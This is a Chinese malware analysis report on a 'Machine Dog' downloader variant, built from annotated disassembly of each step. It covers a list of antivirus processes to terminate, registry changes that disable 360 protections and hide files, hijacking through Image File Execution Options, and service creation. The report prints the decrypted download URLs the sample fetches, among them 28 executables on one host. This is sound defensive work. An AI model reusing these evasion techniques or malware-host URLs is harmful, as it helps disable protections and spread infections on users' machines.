一、病毒标签:
病毒名称: 机器狗最新变种
病毒类型: 下载者
文件SHA1: 11e187662e89fdf5c200f8fbab1672558461e0ce
危害等级: 3
文件长度: 脱壳前37,205 字节,脱壳后130,501 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 2.0 -> bart/xt
二、病毒描述:
该病毒运行会关闭杀软,大量下载病毒木马。
三、行为分析:
1、遍历进程,创建一个名为puuyt互斥体,临时路径释放98989898文件
push ebp
seg001:00416892 mov ebp, esp
seg001:00416894 sub esp, 1Ch
seg001:00416897 call sub_4167D3 ; 遍历进程
seg001:0041689C cmp eax, 0Ah
seg001:0041689F jnb short loc_4168A5
seg001:004168A1 xor eax, eax
seg001:004168A3 leave
seg001:004168A4 retn
seg001:004168A5 ; ---------------------------------------------------------------------------
seg001:004168A5
seg001:004168A5 loc_4168A5: ; CODE XREF: start+E j
seg001:004168A5 push esi ; hWnd
seg001:004168A6 push edi ; lpMsg
seg001:004168A7 push offset aPuuyt ; "puuyt"
seg001:004168AC xor esi, esi
seg001:004168AE push 1 ; bInitialOwner
seg001:004168B0 push esi ; lpMutexAttributes
seg001:004168B1 call CreateMutexA ; 创建一个名为puuyt互斥体
seg001:004168B7 call GetLastError
seg001:004168BD cmp eax, 0B7h
seg001:004168C2 jnz short loc_4168CB
seg001:004168C4 push esi ; uExitCode
seg001:004168C5 call ExitProcess
seg001:004168CB ; ---------------------------------------------------------------------------
seg001:004168CB
seg001:004168CB loc_4168CB: ; CODE XREF: start+31 j
seg001:004168CB mov edi, offset BinaryPathName
seg001:004168D0 push edi ; lpBuffer
seg001:004168D1 push 104h ; nBufferLength
seg001:004168D6 call __imp_GetTempPathA
seg001:004168DC push offset a98989898 ; "98989898"
seg001:004168E1 push edi ; lpString1
seg001:004168E2 call __imp_lstrcatA
seg001:004168E8 push edi ; lpFileName
seg001:004168E9 call sub_4161A0 ; 临时路径创建98989898文件
seg001:004168EE test al, al
seg001:004168F0 pop ecx
seg001:004168F1 jz short loc_4168FF
seg001:004168F3 push edi ; NumberOfBytesWritten
seg001:004168F4 call sub_416849 ; 设置文件指针
2、
遍历以下进程,如存在则结束;劫持Thunder5.exe。
seg001:00415F30 ; kavstart.exe
seg001:00415F30 ;
seg001:00415F30 ; kissvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kmailmon.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfw32.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfwsvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kwatch.exe
seg001:00415F30 ;
seg001:00415F30 ; ccenter.exe
seg001:00415F30 ;
seg001:00415F30 ; ras.exe
seg001:00415F30 ;
seg001:00415F30 ; rstray.exe
seg001:00415F30 ;
seg001:00415F30 ; rsagent.exe
seg001:00415F30 ;
seg001:00415F30 ; ravtask.exe
seg001:00415F30 ;
seg001:00415F30 ; ravstub.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmon.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmond.exe
seg001:00415F30 ;
seg001:00415F30 ; avp.exe
seg001:00415F30 ;
seg001:00415F30 ; 360safebox.exe
seg001:00415F30 ;
seg001:00415F30 ; 360Safe.exe
seg001:00415F30 ;
seg001:00415F30 ; Thunder5.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwmain.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwstub.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwsrv.exe
劫持Thunder5.exe:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
3、修改360注册表键值
seg001:004150AA mov esi, offset aSoftware360saf ; SOFTWARE\360Safe\safemon
seg001:004150AF lea edi, [esp+78h+SubKey]
seg001:004150B3 xor eax, eax
seg001:004150B5 rep movsd
seg001:004150B7 movsb
seg001:004150B8 mov ecx, 12h
seg001:004150BD lea edi, [esp+78h+var_4B]
seg001:004150C1 rep stosd
seg001:004150C3 stosw
seg001:004150C5 lea eax, [esp+78h+hKey]
seg001:004150C9 lea ecx, [esp+78h+SubKey]
seg001:004150CD push eax ; phkResult
seg001:004150CE push ecx ; lpSubKey
seg001:004150CF push 80000002h ; hKey
seg001:004150D4 mov dword ptr [esp+84h+Data], 0
seg001:004150DC mov [esp+84h+var_68], 1
seg001:004150E4 call RegCreateKeyA
seg001:004150EA mov eax, [esp+78h+hKey]
seg001:004150EE mov esi, RegSetValueExA
seg001:004150F4 lea edx, [esp+78h+Data]
seg001:004150F8 push 4 ; cbData
seg001:004150FA push edx ; lpData
seg001:004150FB push 4 ; dwType
seg001:004150FD push 0 ; Reserved
seg001:004150FF push offset ValueName ; "MonAccess"
seg001:00415104 push eax ; hKey
seg001:00415105 call esi ; RegSetValueExA
seg001:00415107 mov edx, [esp+78h+hKey]
seg001:0041510B lea ecx, [esp+78h+Data]
seg001:0041510F push 4 ; cbData
seg001:00415111 push ecx ; lpData
seg001:00415112 push 4 ; dwType
seg001:00415114 push 0 ; Reserved
seg001:00415116 push offset aSiteaccess ; "SiteAccess"
seg001:0041511B push edx ; hKey
seg001:0041511C call esi ; RegSetValueExA
seg001:0041511E mov ecx, [esp+78h+hKey]
seg001:00415122 lea eax, [esp+78h+Data]
seg001:00415126 push 4 ; cbData
seg001:00415128 push eax ; lpData
seg001:00415129 push 4 ; dwType
seg001:0041512B push 0 ; Reserved
seg001:0041512D push offset aExecaccess ; "ExecAccess"
seg001:00415132 push ecx ; hKey
seg001:00415133 call esi ; RegSetValueExA
seg001:00415135 mov eax, [esp+78h+hKey]
seg001:00415139 lea edx, [esp+78h+Data]
seg001:0041513D push 4 ; cbData
seg001:0041513F push edx ; lpData
seg001:00415140 push 4 ; dwType
seg001:00415142 push 0 ; Reserved
seg001:00415144 push offset aArpaccess ; "ARPAccess"
seg001:00415149 push eax ; hKey
seg001:0041514A call esi ; RegSetValueExA
seg001:0041514C mov edx, [esp+78h+hKey]
seg001:00415150 lea ecx, [esp+78h+Data]
seg001:00415154 push 4 ; cbData
seg001:00415156 push ecx ; lpData
seg001:00415157 push 4 ; dwType
seg001:00415159 push 0 ; Reserved
seg001:0041515B push offset aWeeken ; "weeken"
seg001:00415160 push edx ; hKey
seg001:00415161 call esi ; RegSetValueExA
seg001:00415163 mov ecx, [esp+78h+hKey]
seg001:00415167 lea eax, [esp+78h+Data]
seg001:0041516B push 4 ; cbData
seg001:0041516D push eax ; lpData
seg001:0041516E push 4 ; dwType
seg001:00415170 push 0 ; Reserved
seg001:00415172 push offset aIeprotaccess ; "IEProtAccess"
seg001:00415177 push ecx ; hKey
seg001:00415178 call esi ; RegSetValueExA
seg001:0041517A lea edx, [esp+78h+var_68]
seg001:0041517E push 4 ; cbData
seg001:00415180 push edx ; lpData
seg001:00415181 push 4 ; dwType
seg001:00415183 push 0 ; Reserved
seg001:00415185 push offset aLeakshowed ; "LeakShowed"
seg001:0041518A mov eax, [esp+8Ch+hKey]
seg001:0041518E push eax ; hKey
seg001:0041518F call esi ; RegSetValueExA
seg001:00415191 mov edx, [esp+78h+hKey]
seg001:00415195 lea ecx, [esp+78h+var_68]
seg001:00415199 push 4 ; cbData
seg001:0041519B push ecx ; lpData
seg001:0041519C push 4 ; dwType
seg001:0041519E push 0 ; Reserved
seg001:004151A0 push offset aUdiskaccess ; "UDiskAccess"
seg001:004151A5 push edx ; hKey
seg001:004151A6 call esi ; RegSetValueExA
seg001:004151A8 mov eax, [esp+78h+hKey]
seg001:004151AC push eax ; hKey
seg001:004151AD call RegCloseKey
seg001:004151B3 pop edi
seg001:004151B4 pop esi
seg001:004151B5 add esp, 70h
seg001:004151B8 retn
4、干掉360进程
seg001:00415580 sub esp, 130h
seg001:00415586 push ebp
seg001:00415587 push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:0041558C call sub_415020 ; safeboxTray.exe
seg001:00415591 push offset aIkvfrUc ; "┆嗤銝塑?
seg001:00415596 call sub_415020 ; 360tray.exe
seg001:0041559B push offset aCcR ; "骁余讱卧?
seg001:004155A0 call sub_415020 ; psapi.dll
seg001:004155A5 push offset CommandLine ; "枺?
seg001:004155AA call sub_415020 ; /u
seg001:004155AF add esp, 10h
seg001:004155B2 push 0 ; th32ProcessID
seg001:004155B4 push 2 ; dwFlags
seg001:004155B6 call CreateToolhelp32Snapshot
seg001:004155BB mov ebp, eax
seg001:004155BD cmp ebp, 0FFFFFFFFh
seg001:004155C0 jz loc_415737
seg001:004155C6 lea eax, [esp+134h+pe]
seg001:004155CA push esi
seg001:004155CB push eax ; lppe
seg001:004155CC push ebp ; hSnapshot
seg001:004155CD mov [esp+140h+pe.dwSize], 128h
seg001:004155D5 call Process32First
seg001:004155DA test eax, eax
seg001:004155DC jz loc_415711
seg001:004155E2 mov esi, lstrcmpiA
seg001:004155E8 lea ecx, [esp+138h+pe.szExeFile]
seg001:004155EC push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:004155F1 push ecx ; lpString1
seg001:004155F2 call esi ; lstrcmpiA
seg001:004155F4 test eax, eax
seg001:004155F6 jz short loc_41561B
seg001:004155F8
seg001:004155F8 loc_4155F8: ; CODE XREF: sub_415580+99 j
seg001:004155F8 lea edx, [esp+138h+pe]
seg001:004155FC push edx ; lppe
seg001:004155FD push ebp ; hSnapshot
seg001:004155FE call Process32Next
seg001:00415603 test eax, eax
seg001:00415605 jz loc_415711
seg001:0041560B lea eax, [esp+138h+pe.szExeFile]
seg001:0041560F push offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:00415614 push eax ; lpString1
seg001:00415615 call esi ; lstrcmpiA
seg001:00415617 test eax, eax
seg001:00415619 jnz short loc_4155F8 ; 进程是否存在 safeboxTray.exe
seg001:0041561B
seg001:0041561B loc_41561B: ; CODE XREF: sub_415580+76 j
seg001:0041561B mov ecx, [esp+138h+pe.th32ProcessID]
seg001:0041561F push ebx ; lpFileName
seg001:00415620 push ecx ; dwProcessId
seg001:00415621 push 0 ; bInheritHandle
seg001:00415623 push 410h ; dwDesiredAccess
seg001:00415628 call OpenProcess
seg001:0041562E mov ebx, eax
seg001:00415630 test ebx, ebx
seg001:00415632 jz loc_4156FE
seg001:00415638 lea edx, [esp+13Ch+cbNeeded]
seg001:0041563C push edi
seg001:0041563D push edx ; lpcbNeeded
seg001:0041563E lea eax, [esp+144h+hObject]
seg001:00415642 push 4 ; cb
seg001:00415644 push eax ; lphModule
seg001:00415645 push ebx ; hProcess
seg001:00415646 call EnumProcessModules
seg001:0041564B mov ecx, [esp+140h+hObject]
seg001:0041564F push 104h ; nSize
seg001:00415654 push offset ApplicationName ; lpFilename
seg001:00415659 push ecx ; hModule
seg001:0041565A push ebx ; hProcess
seg001:0041565B call GetModuleFileNameExA
seg001:00415660 mov edi, offset ApplicationName
seg001:00415665 or ecx, 0FFFFFFFFh
seg001:00415668 xor eax, eax
seg001:0041566A mov esi, offset ApplicationName
seg001:0041566F repne scasb
seg001:00415671 not ecx
seg001:00415673 dec ecx
seg001:00415674 mov edi, offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:00415679 mov edx, ecx
seg001:0041567B or ecx, 0FFFFFFFFh
seg001:0041567E repne scasb
seg001:00415680 not ecx
seg001:00415682 dec ecx
seg001:00415683 mov edi, offset FileName
seg001:00415688 sub edx, ecx
seg001:0041568A push offset FileName ; lpFileName
seg001:0041568F mov ecx, edx
seg001:00415691 mov eax, ecx
seg001:00415693 shr ecx, 2
seg001:00415696 rep movsd
seg001:00415698 mov ecx, eax
seg001:0041569A xor eax, eax
seg001:0041569C and ecx, 3
seg001:0041569F rep movsb
seg001:004156A1 mov edi, offset aCcR ; "骁余讱卧?
seg001:004156A6 or ecx, 0FFFFFFFFh
seg001:004156A9 repne scasb
seg001:004156AB not ecx
seg001:004156AD sub edi, ecx
seg001:004156AF mov esi, edi
seg001:004156B1 mov edx, ecx
seg001:004156B3 mov edi, offset FileName
seg001:004156B8 or ecx, 0FFFFFFFFh
seg001:004156BB repne scasb
seg001:004156BD mov ecx, edx
seg001:004156BF dec edi
seg001:004156C0 shr ecx, 2
seg001:004156C3 rep movsd
seg001:004156C5 mov ecx, edx
seg001:004156C7 and ecx, 3
seg001:004156CA rep movsb
seg001:004156CC call sub_414F40
seg001:004156D1 add esp, 4
seg001:004156D4 test al, al
5、C:\WINDOWS\Tasks释放1文件,该文件其实是一个dll,主要从http://{blocked}www.hoho-2.cn/down/gr.exe下载者病毒
seg001:0041691D call sub_41630E ; C:\WINDOWS\Tasks释放1文件
6、遍历磁盘分区,查找exe文件
push esi ; lpThreadId
seg001:0041692B push esi ; dwCreationFlags
seg001:0041692C push esi ; lpParameter
seg001:0041692D push offset find_file_exe ; lpStartAddress
seg001:00416932 push esi ; dwStackSize
seg001:00416933 push esi ; lpThreadAttributes
seg001:00416934 call CreateThread
7、查找AfxControlBar42s窗口,修改注册表键值,关闭“显示隐藏文件”
push 7D0h ; dwMilliseconds
seg001:00416205 call Sleep
seg001:0041620B push offset szWindow ; lpszWindow
seg001:00416210 push offset szClass ; "AfxControlBar42s"
seg001:00416215 call sub_416070 ; 查找AfxControlBar42s窗口
seg001:0041621A pop ecx
seg001:0041621B pop ecx
seg001:0041621C call sub_4160ED ; 修改注册表值
seg001:00416221 jmp short modify_reg
进入 call sub_4160ED ; 修改注册表值:
mov esi, offset aSoftwareMicr_0 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:004160FC pop ecx
seg001:004160FD lea edi, [ebp+SubKey]
seg001:00416100 rep movsd
seg001:00416102 push 9
seg001:00416104 xor eax, eax
seg001:00416106 pop ecx
seg001:00416107 lea edi, [ebp+var_38]
seg001:0041610A rep stosd
seg001:0041610C stosw
seg001:0041610E and [ebp+var_10], 0
seg001:00416112 mov dword ptr [ebp+Data], 2
seg001:00416119 stosb
seg001:0041611A lea eax, [ebp+hKey]
seg001:0041611D mov [ebp+var_C], 1
seg001:00416124 push eax ; phkResult
seg001:00416125 lea eax, [ebp+SubKey]
seg001:00416128 push eax ; lpSubKey
seg001:00416129 push 80000001h ; hKey
seg001:0041612E call RegCreateKeyA
seg001:00416134 push 4
seg001:00416136 lea eax, [ebp+Data]
seg001:00416139 pop edi
seg001:0041613A mov esi, RegSetValueExA
seg001:00416140 push edi ; cbData
seg001:00416141 push eax ; lpData
seg001:00416142 push edi ; dwType
seg001:00416143 push 0 ; Reserved
seg001:00416145 push offset aHidden ; "Hidden"
seg001:0041614A push [ebp+hKey] ; hKey
seg001:0041614D call esi ; RegSetValueExA
seg001:0041614F lea eax, [ebp+var_C]
seg001:00416152 push edi ; cbData
seg001:00416153 push eax ; lpData
seg001:00416154 push edi ; dwType
seg001:00416155 push 0 ; Reserved
seg001:00416157 push offset aSuperhidden ; "SuperHidden"
seg001:0041615C push [ebp+hKey] ; hKey
seg001:0041615F call esi ; RegSetValueExA
seg001:00416161 lea eax, [ebp+var_10]
seg001:00416164 push edi ; cbData
seg001:00416165 push eax ; lpData
seg001:00416166 push edi ; dwType
seg001:00416167 push 0 ; Reserved
seg001:00416169 push offset aShowsuperhidde ; "ShowSuperHidden"
seg001:0041616E push [ebp+hKey] ; hKey
seg001:00416171 call esi ; RegSetValueExA
seg001:00416173 push [ebp+hKey] ; hKey
seg001:00416176 call RegCloseKey
seg001:0041617C pop edi
seg001:0041617D pop esi
seg001:0041617E leave
8、干掉cmd.exe
push offset Str1 ; "cmd.exe"
seg001:00414B47 call _stricmp
seg001:00414B4C pop ecx
seg001:00414B4D test eax, eax
seg001:00414B4F pop ecx
seg001:00414B50 jnz short loc_414B33
seg001:00414B52 push dword ptr [esi+8] ; dwProcessId
seg001:00414B55 push eax ; bInheritHandle
seg001:00414B56 push 1 ; dwDesiredAccess
seg001:00414B58 call OpenProcess
seg001:00414B5E push 0 ; uExitCode
seg001:00414B60 push eax ; hProcess
seg001:00414B61 call TerminateProcess
9、释放随机dll文件
seg001:00415E30 push eax ; lpBuffer
seg001:00415E31 push 104h ; nBufferLength
seg001:00415E36 call __imp_GetTempPathA ; 找到临时路径
seg001:00415E3C call __imp_GetTickCount
seg001:00415E42 push eax
seg001:00415E43 lea eax, [ebp+Buffer]
seg001:00415E49 push eax
seg001:00415E4A mov esi, offset byte_4169EC
seg001:00415E4F push offset aSX_dll ; "%s%x.dll"
seg001:00415E54 push esi ; LPSTR
seg001:00415E55 call wsprintfA
seg001:00415E5B push esi ; lpFileName
seg001:00415E5C call sub_414AB4 ; 释放随机命名的dll文件
seg001:00415E61 add esp, 14h
10、下载者列表:
seg001:00415E71 push offset aOlojvssfysgvqn ; "防蕉}ol様YS儌QNLI>px6kfrhYX P_Y"
seg001:00415E76 call sub_414FA0 ; 解密call,解密后为http://tongji1.ac5566.cn/getmac.asp
seg001:00415E7B mov [esp+114h+var_114], offset dword_4144EC
seg001:00415E82 call sub_414FA0 ; 解密call,解密后为http://txt.naiws.com/oo.txt
seg001:00415E87 call sub_415750 ; 调用URLDownloadToFileA函数下载列表上的病毒
seg001:00415E8C mov esi, Sleep
seg001:00415E92 mov [esp+114h+var_114], 0C350h
seg001:00415E99 call esi ; Sleep
seg001:00415E9B push offset dword_4145C0
seg001:00415EA0 call sub_414FA0 ; 解密call,解密后为http://txt.naiws.com/ad.jpg
seg001:00415EA5 pop ecx
seg001:00415EA6 call sub_415BE0 ; 修改hosts文件
seg001:00415EAB call sub_4151DD ; 继续解密,获得Netbios信息
seg001:00415EB0 mov edi, 1F4h
seg001:00415EB5 push edi ; dwMilliseconds
sadfasdf.jpg实际是一个列表文件,内容:
[file]
open=y
url1=http://www.wixks.com/new/new1.exe
url2=http://www.wixks.com/new/new2.exe
url3=http://www.wixks.com/new/new3.exe
url4=http://www.wixks.com/new/new4.exe
url5=http://www.wixks.com/new/new5.exe
url6=http://www.wixks.com/new/new6.exe
url7=http://www.wixks.com/new/new7.exe
url8=http://www.wixks.com/new/new8.exe
url9=http://www.wixks.com/new/new9.exe
url10=http://www.wixks.com/new/new10.exe
url11=http://www.wixks.com/new/new11.exe
url12=http://www.wixks.com/new/new12.exe
url13=http://www.wixks.com/new/new13.exe
url14=http://www.wixks.com/new/new14.exe
url15=http://www.wixks.com/new/new15.exe
url16=http://www.wixks.com/new/new16.exe
url17=http://www.wixks.com/new/new17.exe
url18=http://www.wixks.com/new/new18.exe
url19=http://www.wixks.com/new/new19.exe
url20=http://www.wixks.com/new/new20.exe
url21=http://www.wixks.com/new/new21.exe
url22=http://www.wixks.com/new/new22.exe
url23=http://www.wixks.com/new/new23.exe
url24=http://www.wixks.com/new/new24.exe
url25=http://www.wixks.com/new/new25.exe
url26=http://www.wixks.com/new/new26.exe
url27=http://www.wixks.com/new/new27.exe
url28=http://www.wixks.com/new/new28.exe
count=28
11、提权
call sub_416223 ; 提权
12、创建一个名为Kisstusb的服务,完成后清除该服务
seg001:004166C9 push offset ServiceName ; "Kisstusb"
seg001:004166CE call sub_416402 ; 创建一个名为Kisstusb的服务
seg001:004166D3 mov esi, eax
seg001:004166D5 pop ecx
seg001:004166D6 test esi, esi
seg001:004166D8 pop ecx
seg001:004166D9 jz short loc_416702
seg001:004166DB lea eax, [ebp+ServiceStatus]
seg001:004166DE push eax ; lpServiceStatus
seg001:004166DF push esi ; hService
seg001:004166E0 call QueryServiceStatus
seg001:004166E6 test eax, eax
seg001:004166E8 jz short loc_4166F0
seg001:004166EA cmp [ebp+ServiceStatus.dwCurrentState], 4
seg001:004166EE jz short loc_4166FB
seg001:004166F0
seg001:004166F0 loc_4166F0: ; CODE XREF: sub_4166BF+29 j
seg001:004166F0 push 0 ; lpServiceArgVectors
seg001:004166F2 push 0 ; dwNumServiceArgs
seg001:004166F4 push esi ; hService
seg001:004166F5 call StartServiceA ; 启动服务
seg001:004166FB
seg001:004166FB loc_4166FB: ; CODE XREF: sub_4166BF+2F j
seg001:004166FB push esi ; hSCObject
seg001:004166FC call CloseServiceHandle
seg001:00416702
seg001:00416702 loc_416702: ; CODE XREF: sub_4166BF+1A j
seg001:00416702 push [ebp+lpBinaryPathName] ; lpFileName
seg001:00416705 call DeleteFileA
seg001:0041670B push offset pszSubKey ; SYSTEM\CurrentControlSet\Services\Kisstusb
seg001:00416710 push 80000002h ; hkey
seg001:00416715 call SHDeleteKeyA ; 清除该服务
系统0day安全 - 二进制漏洞攻防
上传的附件:
